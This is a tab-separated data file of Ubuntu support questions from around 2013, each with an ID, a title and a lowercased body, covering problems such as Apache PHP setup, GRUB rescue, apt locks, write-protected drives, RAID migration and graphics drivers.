373374	lamp stack 's php not working ( recently upgrated to 13.10/apache 2.4.6 )	having problems with php on my lamp stack , php scripts are n't being parsed . fwiw , i recently upgraded to 13.10 , it used to work great before that ; not positive my issues are related , seems like an easy guess though . regardless , i just purged/re-installed apache2 , php5 , php5-common , and libapache2-mod-php5 , but i still ca n't run a simple phpinfo.php script in /var/www , instead it returns the raw code as output . it does appear that the php module is loaded , but i 'm not sure how to track it any further . here 's ( hopefully ) some helpful info , let me know if i left anything important out , and thanks in advance : xyz @ nanook : /var/www $ tail -n 2 /var/log/apache2/error.log [ fri nov 08 23:16:39.710701 2013 ] [ mpm_prefork : notice ] [ pid 2001 ] ah00163 : apache/2.4.6 ( ubuntu ) php/5.5.3-1ubuntu2 configured -- resuming normal operations [ fri nov 08 23:16:39.809033 2013 ] [ core : notice ] [ pid 2001 ] ah00094 : command line : '/usr/sbin/apache2' xyz @ nanook : /var/www $ apache2ctl -s virtualhost configuration : *:8000 is a namevirtualhost default server nanook ( /etc/apache2/sites-enabled/000-default.conf:1 ) port 8000 namevhost nanook ( /etc/apache2/sites-enabled/000-default.conf:1 ) port 8000 namevhost nanook ( /etc/apache2/sites-enabled/000-default.conf:1 ) serverroot : `` /etc/apache2 '' main documentroot : `` /var/www '' main errorlog : `` /var/log/apache2/error.log '' mutex watchdog-callback : using_defaults mutex default : dir= '' /var/lock/apache2 '' mechanism=fcntl mutex mpm-accept : using_defaults pidfile : `` /var/run/apache2/apache2.pid '' define : dump_vhosts define : dump_run_cfg user : name= '' www-data '' id=33 not_used group : name= '' www-data '' id=33 not_used user : name= '' www-data '' id=33 not_used group : name= '' www-data '' id=33 not_used xyz @ nanook : /var/www $ apache2ctl -m | grep php php5_module ( shared ) xyz @ nanook : /var/www $ cat phpinfo.php < ? php phpinfo ( ) ? > xyz @ nanook : /var/www $ cat /etc/apache2/sites-enabled/000-default.conf < virtualhost *:8000 > serveradmin webmaster @ localhost documentroot /var/www errorlog $ { apache_log_dir } /error.log customlog $ { apache_log_dir } /access.log combined < /virtualhost > xyz @ nanook : /var/www $ /usr/bin/php -- version php 5.5.3-1ubuntu2 ( cli ) ( built : oct 9 2013 14:49:12 ) copyright ( c ) 1997-2013 the php group zend engine v2.5.0 , copyright ( c ) 1998-2013 zend technologies with zend opcache v7.0.3-dev , copyright ( c ) 1999-2013 , by zend technologies with xdebug v2.2.3 , copyright ( c ) 2002-2013 , by derick rethans
373377	ubuntu 13.10 gnome shell	when i am upgrade ubuntu from 13.04 to 13.10 my gnome shell becomes this : screenshot what 's wrong ?
373379	installation procedure for huwaei e303c dongle	i 'd like a step-by-step procedure for installing my huwaei eo303c dongle in ubuntu 12.04 . i am quite new to this , and i have n't been successful in installing it despite trying out a number of methods .
373380	ubuntu froze during upgrade to 13.10	my computer boots into ubuntu , but there are issues with the way unity loads up . there is nothing on the panel in the top right corner of my desktop , although the launcher appears . i tried safe mode and recovery mode , but i was unable to repair it or start with networking mode . how do i proceed ? should i try to install ubuntu 13.10 alongside windows 7 again ?
373382	mac os partition help	i am very new to this , i tried ubuntu and i liked it . i am trying to create a partition to install it on my mac but i do n't know what format to make the partition . i also went to the mactel page and i could not find my model , i have a macbook pro 9,1 .
373385	how do i fix `` grub rescue '' ? uninstallation ?	i am currently dual-booting windows 7 and ubuntu . i am about to sell my computer so i was following a tutorial on how to uninstall ubuntu . i had deleted my partitions like the tutorial said and now i get this : error : no such partition grub rescue > _ i am now looking for help on getting out of this `` grub rescue '' uninstalling ubuntu and/or factory reset notes -newbie - no windows disks -i have spare cds
373386	start specific programs in different workspaces at user login	i 've some programs that i always run after my login : eclipse , terminator , firefox . so i want to create a script , to put in .bash_login , and that will be executed only when i login in a gui . this script will open my programs in maximized mode , putting , for example , terminator in upper left workspace , eclipse in the upper right one , and firefox in the lower left . can you help me in writing this script ? ps : i use unity .
373388	where does the youtube video files stored on system nowadays ?	when i open a youtube video with firefox i could not find any video file inside ~/.mozilla/firefox/ < some_string > .default/cache/ . i also tried with google-chrome like , ps ax | grep flash ls -l /proc/ [ *pid* ] /fd | grep flash but again /proc/ [ *pid* ] /fd does not have any video like file . ls -l /proc/ [ *pid* ] /fd have some results like lrwx -- -- -- 1 root root 64 nov 9 12:18 22 - > /run/shm/.com.google.chrome.eoshnu ( deleted ) lrwx -- -- -- 1 root root 64 nov 9 12:18 23 - > /run/shm/.com.google.chrome.p8h6bl ( deleted ) result of ls -l /proc/ [ *pid* ] /fd | grep flash for some videos from other site is like lrwx -- -- -- 1 root root 64 nov 9 12:35 26 - > /home/username/.config/google-chrome/default/pepper data/shockwave flash/.com.google.chrome.qmzxp8 ( deleted ) but could not be copied . then what are the places where firefox or google-chrome stores the streaming videos ? and is it possible to recover ( copy ) a video from there to watch them offline ? p.s i have other ways ( downloaders ) to have streaming videos , but my question is very specific .
373391	wrong package for idle-python2.7 ?	i 'm running python 2.7 in ubuntu 13.10 , and idle ( idle-python2.7 ) has stopped working . whenever i try to open a file in a editor window , it is blank , though the file does exist and is not empty/blank . furthermore , it is not possible to close idle after this , except via a terminal kill command . idle was working fine before . the problem appeared after i installed a number of things , including idlex , various scipy modules and mpmath , but after trying to repair it in several ways , it seems to be caused by ubuntu 's official idle package . i get this error in the terminal when trying to open a file in idle : exception in tkinter callback [ ... lines ommitted for brevity ... ] file `` /usr/lib/python2.7/idlelib/iobinding.py '' , line 129 , in coding_spec for line in lst : nameerror : global name 'lst ' is not defined if you look at the code , it looks like an obvious bug : indeed lst is not defined in the function coding_spec . furthermore , the source file iobinding.py in http : //fossies.org/dox/python-2.7.5/iobinding_8py_source.html is different and does n't show the problem . thinking that one of the recently packages had overwritten the file somehow , i 've tried a number of things , including reinstalling all python packages from synaptic , but the wrong iobinding.py is still there . the reason i think the problem lies with the package itself is that i finally did sudo apt-get remove idle , verified that the idlelib directory was empty , and reinstalled with sudo apt-get install idle ; but the wrong iobinding.py file came back again . i can in fact make idle work again by simply replacing lst by str in the code , but to me that 's clearly a no-no . i 'm not to happy either about trying to replace just that file from the source python distribution , as other files may be wrong . i want to get the right files from the official package .
373404	no wifi on ubuntu 12.04 lts after today software update	i just got new dell inspiron3537 with ubuntu 12.04 lts ( no windows o/s ) . it got some wireless ( hard block ) yesterday . so , this morning , i ran the software update all the security update . after that i ca n't see `` wireless '' in system setting . so , i updated all the software update and looked thru several web site and found sudo lshw -c network command . i tried and found the result below . *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 07 serial : 74:86:7a:40:5d:48 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.10 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:60 ioport:4000 ( size=256 ) memory : c0700000-c0700fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0600000-c067ffff memory:9fb00000-9fb0ffff please suggest what i should do to fix it .
373406	i used bumblebee to ruin my display resolution . how can i change it back to default settings ?	i have an nvidia 470 and ubuntu looked great oob . i tried bumblebee to install nvidia drivers , and the resolution went from great to lousy . how can i change my resolution back to the default , without re-installing ubuntu ?
373410	magic sysrq not working on toshiba satellite c660	the sysrq key on my toshiba satellite c660 is assigned to fn+home . when i 'm invoking alt+fn+sysrq+magic sysrq key , it does n't do anything . what do i have to press instead ? raring x64
373413	error in installing youtube.dl package	error in installing youtube-dl package sudo apt-get install youtube-dl -y [ sudo ] password for hp : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : ffmpeg libav-tools libavcodec-extra-53 libavdevice53 libavfilter2 libavformat53 libavutil-extra-51 libpostproc52 libswscale2 rtmpdump suggested packages : libfaad0 mplayer the following new packages will be installed : ffmpeg libav-tools libavdevice53 libavfilter2 rtmpdump youtube-dl the following packages will be upgraded : libavcodec-extra-53 libavformat53 libavutil-extra-51 libpostproc52 libswscale2 5 upgraded , 6 newly installed , 0 to remove and 488 not upgraded . need to get 4,471 kb of archives . after this operation , 2,614 kb of additional disk space will be used . get:1 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libpostproc52 amd64 4:0.8.8-0ubuntu0.12.04.1 [ 63.4 kb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libswscale2 amd64 4:0.8.8-0ubuntu0.12.04.1 [ 92.2 kb ] get:3 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libavformat53 amd64 4:0.8.8-0ubuntu0.12.04.1 [ 495 kb ] get:4 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe libavcodec-extra-53 amd64 4:0.8.8ubuntu0.12.04.1 [ 2,932 kb ] get:5 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe libavutil-extra-51 amd64 4:0.8.8ubuntu0.12.04.1 [ 67.7 kb ] get:6 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libavdevice53 amd64 4:0.8.8-0ubuntu0.12.04.1 [ 29.1 kb ] get:7 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libavfilter2 amd64 4:0.8.8-0ubuntu0.12.04.1 [ 80.7 kb ] get:8 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libav-tools amd64 4:0.8.8-0ubuntu0.12.04.1 [ 615 kb ] get:9 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main ffmpeg all 4:0.8.8-0ubuntu0.12.04.1 [ 2,226 b ] get:10 http : //us.archive.ubuntu.com/ubuntu/ precise/universe rtmpdump amd64 2.4~20110711.gitc28f1bab-1 [ 46.6 kb ] get:11 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/universe youtube-dl all 2012.02.27-1ubuntu0.1 [ 46.7 kb ] fetched 4,471 kb in 8min 49s ( 8,440 b/s ) e : problem renaming the file /var/cache/apt/pkgcache.bin.y3818z to /var/cache/apt/pkgcache.bin - rename ( 2 : no such file or directory ) debconf : apt-extracttemplates failed : no such file or directory dpkg : error : dpkg status database is locked by another process e : sub-process /usr/bin/dpkg returned an error code ( 2 )
373419	ethernet port - wire unplugged problem	i have hp pavilion dv6-6119tx entertainment notebook pc . i installed dual boot either 12.04 or 13.04 or 13.10 ubuntu from windows 7 . the ethernet/lan port was working at the time but when i switched to windows , ethernet/lan port was working but when again switched to ubuntu , it says wire unplugged . i do n't understand the problem . what should i do.please help ! ! ! ! !
373420	ubuntu installed first in dual boot	how can i dual boot ubuntu and windows 8 . with ubuntu 13.10 pre installed . because something wrong in windows 8 . i want to install windows 8 over ubuntu pre installed . please help me .
373421	ca n't boot - `` waiting for network configuration ''	after an update on 13.10 , my pc wo n't boot ubuntu any longer . it displays the infamous `` waiting for network configuration '' message and then hangs . i can go into recovery mode , and choose `` start networking '' and then go to a root prompt , and that works fine . ping works . /etc/network/interfaces contains just the two lines `` auto lo '' and `` iface lo inet loopback '' . i 've double-checked that my network is working , the cable is working ( it works on another pc ) and the network card seems to indicate a connection . any suggestions on how to get my pc booted again ? right now i 'm limited to a root shell prompt .
373422	installed ubuntu 12.04 on a hp 14 chromebook.. there is no ubuntu software center , or browser	it wcs a successful installation , with a quick switch option between ubuntu and chromeos without rebooting . however it installed without the ubuntu software center . i am a noobie , and i can not install any software ... .ive tried `` sudo apt-get software-center '' , `` sudo apt-get software '' i get `` invalid operation '' help !
373424	is there any gui based software for pinging multiple ip address at a time in linux ?	is there any gui based software for pinging multiple ip address at a time in linux ? such tools are available in windows . graphical tool will be good and easy to use than command based one . thank you in advance .
373425	how can i make apt-get wait for another instance to finish ?	is there any way i can make apt-get wait for the other apt-get ( or another package manager ) process to finish ? i know that , generally , apt-get can only run one instance at a time and if we try to run another apt-get instance at the same time , then we get a message saying that some other process is using it . my question is : how can i make apt-get wait for the other processes to finish and then run ? an advantage is that there is no need to type the command apt-get again , it will be automated after the 1st apt-get finishes .
373426	read-only pendrive	i 'm trying to format a pen-drive ( daiichi-sankyo ) but it 's read-only and/or write protected . i list all commands results i made so far : sudo gparted & unable to open /dev/sdb read-write ( read-only file system ) . /dev/sdb has been opened read-only . this is a dmesg output for /dev/sdb : ~ $ sudo dmesg | grep sdb [ 191.911329 ] sd 6:0:0:0 : [ sdb ] 16384 512-byte logical blocks : ( 8.38 mb/8.00 mib ) [ 191.913004 ] sd 6:0:0:0 : [ sdb ] write protect is on [ 191.913010 ] sd 6:0:0:0 : [ sdb ] mode sense : 0b 00 80 08 [ 191.914389 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 191.914396 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 191.922249 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 191.922256 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 191.923511 ] sdb : [ 191.933448 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 191.933454 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 191.933458 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 6735.046192 ] fat-fs ( sdb ) : unrecognized mount option `` x-gvfs-show '' or missing value [ 8245.875288 ] sd 7:0:0:0 : [ sdb ] 16384 512-byte logical blocks : ( 8.38 mb/8.00 mib ) [ 8245.878455 ] sd 7:0:0:0 : [ sdb ] write protect is on [ 8245.878463 ] sd 7:0:0:0 : [ sdb ] mode sense : 0b 00 80 08 [ 8245.879828 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 8245.879834 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 8245.889213 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 8245.889225 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 8245.890452 ] sdb : [ 8245.895956 ] sd 7:0:0:0 : [ sdb ] no caching mode page found [ 8245.895962 ] sd 7:0:0:0 : [ sdb ] assuming drive cache : write through [ 8245.895968 ] sd 7:0:0:0 : [ sdb ] attached scsi removable disk [ 8245.945151 ] scsi 7:0:0:0 : [ sdb ] killing request [ 8245.945162 ] scsi 7:0:0:0 : [ sdb ] unhandled error code [ 8245.945165 ] scsi 7:0:0:0 : [ sdb ] [ 8245.945172 ] scsi 7:0:0:0 : [ sdb ] cdb : [ 8245.945196 ] end_request : i/o error , dev sdb , sector 16378 [ 8245.945200 ] buffer i/o error on device sdb , logical block 2047 [ 8245.945217 ] buffer i/o error on device sdb , logical block 2047 [ 8245.945315 ] buffer i/o error on device sdb , logical block 1 [ 8245.945320 ] buffer i/o error on device sdb , logical block 1 [ 8245.945327 ] buffer i/o error on device sdb , logical block 1 [ 8245.945360 ] buffer i/o error on device sdb , logical block 2047 [ 8245.945370 ] buffer i/o error on device sdb , logical block 0 [ 8245.945377 ] buffer i/o error on device sdb , logical block 0 [ 8245.945383 ] buffer i/o error on device sdb , logical block 0 [ 8245.945389 ] buffer i/o error on device sdb , logical block 0 [ 8249.197205 ] sd 8:0:0:0 : [ sdb ] 16384 512-byte logical blocks : ( 8.38 mb/8.00 mib ) [ 8249.198210 ] sd 8:0:0:0 : [ sdb ] write protect is on [ 8249.198219 ] sd 8:0:0:0 : [ sdb ] mode sense : 0b 00 80 08 [ 8249.199452 ] sd 8:0:0:0 : [ sdb ] no caching mode page found [ 8249.199460 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 8249.207734 ] sd 8:0:0:0 : [ sdb ] no caching mode page found [ 8249.207741 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 8249.209151 ] sdb : [ 8249.213093 ] sd 8:0:0:0 : [ sdb ] no caching mode page found [ 8249.213100 ] sd 8:0:0:0 : [ sdb ] assuming drive cache : write through [ 8249.213104 ] sd 8:0:0:0 : [ sdb ] attached scsi removable disk i have tried with : sudo hdparm -r0 /dev/sdb /dev/sdb : setting readonly to 0 ( off ) readonly = 0 ( off ) and than with : sudo dd if=/dev/zero of=/dev/sdb bs=512 count=16 dd : opening ‘/dev/sdb’ : read-only file system the strange thing is this : sudo fdisk -l /dev/sdb disk /dev/sdb : 8 mb , 8388608 bytes 1 heads , 16 sectors/track , 1024 cylinders , total 16384 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f727265 this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 1684955424 3386954047 850999312 6c unknown /dev/sdb2 ? 1998616933 2542722764 272052916 6e unknown /dev/sdb3 ? 538988361 1077964648 269488144 79 unknown /dev/sdb4 ? 1394614304 1394635640 10668+ 53 ontrack dm6 aux3 partition table entries are not in disk order i do n't have these partions available i have only /dev/sdb : ls -la /dev/sdb* brw-rw -- -- 1 root disk 8 , 16 nov 9 11:32 /dev/sdb my question is how can i make this device rw ? sudo mount -o rw /dev/sdb /media/krozus/mnt/ mount : block device /dev/sdb is write-protected , mounting read-only
373427	updating problem in ubuntu 11.10	i am using sudo apt-get update command for updating . while updating ubuntu it shows : e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? can anyone help ?
373428	dpkg says adobe-flashplugin not installed	i 've tried installing adobe-flash-properties-gtk using dpkg . it says the dependency adobe-flashplugin is missing . despite having adobe flash working properly , dpkg -l | grep flash only returns flashplugin-installer ( install ok installed ) and adobe-flash-properties-gtk ( install ok unpacked ) where is my adobe-flashplugin ? ps : i 've been messing around with gnash and lightspark a bit a few weeks ago , and restored adobe flash afterwards . raring x64
373429	successfully upgraded from 13.04 to 13.10 but after some weeks get black screen	i 'm hoping for some help on this . i looked been into several related problems , but none of them seem to work for me . i upgraded from ubuntu 13.04 to 13.10 several weeks ago and it has been running smoothly . two days ago ( november 7 ) i had a software update , and yesterday i got a black screen after login . i have an nvidia graphics card , and in order to get cairo dock and the cube to work one needs the nvidia restricted drivers . as far as i can understand from what i can find , it relates to the drivers . many of the answers i found require some background knowledge which i do n't have . could someone give a newbie like myself a clean step-by-step introduction to how this is solved ?
373431	keyboard shortcuts are not working for a script that works on terminal	i have made a script and called it cp-to-dropbox . it goes as follows : # ! /bin/bash rm -rd /home/me/documents/link\ to\ aus/ele490/hw/shared\ outbox/* cp -r /home/me/documents/link\ to\ aus/ele490/hw/minutes /home/me/documents/link\ to\ aus/ele490/hw/mmaps/outlines /home/me/documents/link\ to\ aus/ele490/hw/my\ part /home/me/documents/link\ to\ aus/ele490/hw/shared\ outbox when i run this in the terminal , it does what i want . the problem is , it wo n't work when i set a keyboard shortcut to my script . any ideas ?
373432	black screen - eld buf size of 0 , force 128	yesterday an update came up on my ubuntu 13.04 ( 64bit ) . kernel and some other stuff . i 've installed the update , but did n't reboot quite than because i 've planned to shutdown my pc anyways an hour later . so today , i was booting the pc , choosing my ubuntu . i was prompted for my password , all normal , but then only a black screen . with `` system error '' pop-up in the top left , asking me to report it ( but nothing happened when i clicked the button ) . so i 've changed the runlevel ( i guess that 's what it 's called ? the ctrl alt f3/ ... combi ) , logged in , asked dmesg what 's up and it told me : hdmi : eld buf size of 0 , force 128 . i 've checked for updates , another kernel update or something that might fix this in the repos but i could not find anything . any ideas ? thank you .
373435	file partioning	i 'm just asking if what is the appropriate file system should i use in using ubuntu 12.04 because i ca n't install ubuntu on my virtual machine and it say 's `` no root file system is defined please correct it from the partitioning menu ''
373439	how can i make my system bootable again after transfering it from an smal hdd to a raid 1 volume	i 'm trying to move my ubuntu system from a 320gb disk to a raid1 volume . based on the artikel : how do i move my lvm 250 gb root partition to a new 120gb hard disk ? what i have done so far : physically removed the system disk attached 2 500gb hds created a raid 1 volume started a ubuntu installation ( 13.04 x86 ) to get the partitions to the raid disk aborted the ubuntu installation removed the new vg `` ubuntu-vg '' from the raid 1 `` disks '' removed missing vg ( vgreduce -- removemissing ) extended the new raid 1 volume to the old vg `` ubuntu '' moved the volume group to the raid 1 volume split the volume group of the old system disk now i 'm trying to make my raid system bootable : sudo mount /dev/mapper/ubuntu-root /mnt sudo chroot /mnt -- > error , because of the wrong ubuntu version on the usb boot stick -- > created a new usb boot stick with ubuntu 13.04 amd64 and tried again ? ? ? can anybody give me some hints how to make my system bootable again and fix the following errors ? ? ? update-grub -- > /usr/sbin/grub-probe : fehler : ger채t f체r / konnte nicht gefunden werden ( ist /dev eingeh채ngt ? ) . -- > device / ca n't be found ( is /dev mounted ? ) vi /etc/fstab -- > `` /etc/fstab '' e212 : ca n't open file for writing i 've also tried to modify the /etc/fstab before chroot but the error is the same ps : some details of my system sudo mount /dev/mapper/ubuntu-root on /mnt type ext4 ( rw ) sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda : type= '' isw_raid_member '' /dev/sdb1 : uuid= '' cb0e1a1f-aeeb-4c47-85aa-f010944bfa43 '' type= '' ext2 '' /dev/sdb5 : uuid= '' vue9vg-8cd5-iu7l-zuz7-pirs-uapw-asgbdo '' type= '' lvm2_member '' /dev/sdc5 : uuid= '' b1scbv-4nus-4pis-uqyy-lv4l-qqnr-2iubaw '' type= '' lvm2_member '' /dev/sdd1 : label= '' ubuntu 1304 '' uuid= '' 4c89-5323 '' type= '' vfat '' /dev/mapper/ubuntu-root : uuid= '' dfc16cd8-c11d-47ea-90f7-a135e44fefeb '' type= '' ext4 '' /dev/mapper/ubuntu-swap_1 : uuid= '' 1964e003-21a5-4bc1-8cc8-6add974bda44 '' type= '' swap '' cat /mnt/etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > /dev/mapper/ubuntu-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=cb0e1a1f-aeeb-4c47-85aa-f010944bfa43 /boot ext2 defaults 0 2 # uuid=dfc16cd8-c11d-47ea-90f7-a135e44fefeb /boot ext2 defaults 0 2 /dev/mapper/ubuntu-swap_1 none swap sw 0 0 sudo pvdisplay -- - physical volume -- - pv name /dev/sdc5 vg name ubuntu pv size 465,52 gib / not usable 4,00 mib allocatable yes pe size 4,00 mib total pe 119172 free pe 42927 allocated pe 76245 pv uuid b1scbv-4nus-4pis-uqyy-lv4l-qqnr-2iubaw -- - physical volume -- - pv name /dev/sdb5 vg name ubuntu-vg pv size 297,85 gib / not usable 4,00 mib allocatable yes pe size 4,00 mib total pe 76249 free pe 76249 allocated pe 0 pv uuid vue9vg-8cd5-iu7l-zuz7-pirs-uapw-asgbdo sudo lvdisplay -- - logical volume -- - lv path /dev/ubuntu/root lv name root vg name ubuntu lv uuid 7yyb04-ih38-vuox-k3qq-ewe5-guzo-yewn5z lv write access read/write lv creation host , time ubuntu , 2013-03-14 21:11:04 +0000 lv status available # open 1 lv size 295,85 gib current le 75738 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv path /dev/ubuntu/swap_1 lv name swap_1 vg name ubuntu lv uuid hpjcne-fhgg-vc0y-zlfk-qddj-woy5-ourmdl lv write access read/write lv creation host , time ubuntu , 2013-03-14 21:11:06 +0000 lv status available # open 0 lv size 1,98 gib current le 507 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000d33ad device boot start end blocks id system /dev/sda1 2048 499711 248832 83 linux /dev/sda2 501758 976766975 488132609 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 501760 976766975 488132608 8e linux lvm disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c2777 device boot start end blocks id system /dev/sdb1 * 2048 499711 248832 83 linux /dev/sdb2 501758 625141759 312320001 5 extended /dev/sdb5 501760 625141759 312320000 8e linux lvm disk /dev/sdc : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d33ad device boot start end blocks id system /dev/sdc1 2048 499711 248832 83 linux /dev/sdc2 501758 976766975 488132609 5 extended /dev/sdc5 501760 976766975 488132608 8e linux lvm disk /dev/sdd : 1010 mb , 1010827264 bytes 255 heads , 63 sectors/track , 122 cylinders , total 1974272 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x050e7bae device boot start end blocks id system /dev/sdd1 * 2048 1974271 986112 c w95 fat32 ( lba ) disk /dev/mapper/ubuntu-root : 317.7 gb , 317668196352 bytes 255 heads , 63 sectors/track , 38620 cylinders , total 620445696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 2126 mb , 2126512128 bytes 255 heads , 63 sectors/track , 258 cylinders , total 4153344 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table
373440	black screen when running xubuntu 13.10 after upgrade	i have a xubuntu v12 that i updated to v13.10 . sice the upgrade i get the black screen at a startup . i can get to the console and login . how can i run it in graphic mode ? i run it on oracle virtualbox . starting the virtualbox guest additions ... done . starting virtualbox guest addition service ... done . saned disabled ; edit /etc/default/saned ; * restoring resolver state ... [ ok ] and it hangs on this .
373447	use intel hd graphics for x server and left nvidia for gpu computation	i have a computer running an intel cpu ( with hd graphics ) and a nvidia geforce display card . since i just need the gpu for cuda/opencl computation , i want to config the computer to use intel hd graphics instead to save video memory . therefore , i try to switch back the primary display adapter from nvidia to intel hd graphics in bios . however , if i switch to use intel hd graphics in my bios , /dev/nvidia0 , /dev/nvidiactl and even some command like nvidia-smi will be disappear . when i run $ lsmod | grep nvidia nvidia 9430169 0 i can see nvidia module is loaded . if i switch back the use nvidia in bios , /dev/nvidia0 , /dev/nvidiactl and nvidia-smi command appear again . how can i solve it ? i am running $ uname -a linux xxxxx 3.8.0-32-generic # 47~precise1-ubuntu smp wed oct 2 16:19:35 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.3 lts '' nvidia driver 319.37 from developer.nvidia.com ubuntu package directly ( here )
373448	my hard disk has 120 bad sectors !	recently , due to a power failure , my system shut down abruptly and since then i am facing this problem ! my laptop hangs very frequently and the filesystem becomes read only . i ran disk utility which showed that there are 120 bad sectors ! what should i do ?
373449	getting started after installation	my computer is from 2009 and currently runs with windows xp . i 've installed unbuntu yesterday . when i start , i am asked about the operating programme , i choose ubuntu and next comes a black screen with lines beginning with grub > . i do n't really know what i am to do at this stage or how to start ubuntu . i would be very glad if somebody could help me . thank you very much , robert .
373450	how to separate disk partition after complete installation ?	i have following setup.i want a new separate 200gb partition . i 'll try fdisk /dev/sda to command new partition via but i ca n't exactly.i need help disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000216a9 device boot start end blocks id system /dev/sda1 * 2048 968587263 484292608 83 linux /dev/sda2 968589310 976771071 4090881 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 968589312 976771071 4090880 82 linux swap / solaris
373453	start paused torrents when idle	is there is a torrent client that will automatically start downloading paused torrents when idle , and stop them when i move the mouse or start doing stuff on my ubuntu ? i had searched for it they said there is an option in windows torrent clients the option is called `` stop transers on user interaction '' when i can find a torrent client for ubuntu that have this option ? note : im using ubuntu 13.10
